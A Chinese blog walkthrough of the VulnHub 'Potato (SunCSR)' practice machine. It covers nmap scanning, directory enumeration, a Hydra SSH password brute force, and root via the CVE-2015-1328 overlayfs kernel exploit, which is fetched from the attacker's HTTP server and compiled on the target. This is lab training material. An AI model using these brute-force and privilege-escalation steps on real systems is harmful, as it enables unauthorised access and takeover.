靶机地址:https://www.vulnhub.com/entry/potato-suncsr-1,556/
一、主机发现+信息收集
nmap -sn 192.168.25.0/24
或
arp-scan -l
靶机ip:192.168.25.163
设置环境变量
export ip=192.168.25.163
端口扫描
nmap --min-rate 10000 -p- $ip
PORT STATE SERVICE 80/tcp open http 7120/tcp open unknown MAC Address: 00:0C:29:82:3B:39 (VMware)
服务信息收集
nmap -sS -sV -O -p80,7120 $ip
PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 7120/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0) MAC Address: 00:0C:29:82:3B:39 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
脚本扫描
nmap --script=vuln -p80,7120 $ip
PORT STATE SERVICE 80/tcp open http |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-csrf: Couldn't find any CSRF vulnerabilities. | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | http://ha.ckers.org/slowloris/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 | http-enum: |_ /info.php: Possible information file 7120/tcp open unknown MAC Address: 00:0C:29:82:3B:39 (VMware)
二、开始渗透测试
访问80端口
静态图片页面,十分的CTF风格
potato
web指纹记录一下
源码查看也是没有什么收获,这里我们直接爆破一下目录
gobuster dir -u http://192.168.25.163/ -w /usr/share/dirbuster/wordlists/medium.txt
没扫到
---- Scanning URL: http://192.168.25.163/ ---- + http://192.168.25.163/index.html (CODE:200|SIZE:654) + http://192.168.25.163/info.php (CODE:200|SIZE:87513) + http://192.168.25.163/server-status (CODE:403|SIZE:294)
http://192.168.25.163/info.php
我们得到了泄露的phpinfo文件,但其实还是没有什么突破点,现在就只剩下ssh的爆破了
7120端口爆破
hydra爆破ssh ,用户名直接就是potato了目前只有这一条信息
hydra -l potato -P /usr/share/wordlists/john.lst ssh://192.168.25.163:7120
这里我们得到了密码 letmein
三、获得初始权限
我们直接连接ssh 的 7120端口,这里我们用-p参数进行端口指定连接
ssh potato@192.168.25.163 -p 7120
四、提权
id
ip addr
uname -a
Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
内核版本比较低 Linux ubuntu 3.13.0
我们直接去找EXP
searchsploit Linux ubuntu 3.13.0
找到很多我们这里下载第一个
searchsploit -m 37292
因为这个是本地提权的EXP,所以我们需要把这个EXP传到靶机上
攻击机开启服务器
python3 -m http.server 10000
然后到靶机上使用wget进行下载
靶机先到tmp目录中,其他目录没有权限
head -n 20 37292.c
看一下使用说明
# Exploit Title: ofs.c - overlayfs local root in ubuntu # Date: 2015-06-15 # Exploit Author: rebel # Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15) # Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04 # CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html) *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* CVE-2015-1328 / ofs.c overlayfs incorrect permission handling + FS_USERNS_MOUNT user@ubuntu-server-1504:~$ uname -a Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux user@ubuntu-server-1504:~$ gcc ofs.c -o ofs user@ubuntu-server-1504:~$ id uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev) user@ubuntu-server-1504:~$ ./ofs spawning threads
使用gcc 37292.c -o 37292 进行编译
./37292进行执行
成功提权
非特殊说明,本博所有文章均为博主原创。
如若转载,请注明出处:https://www.oneblanks.xyz/potato-suncsr%e9%9d%b6%e6%9c%ba%e7%bb%83%e4%b9%a0/
共有 0 条评论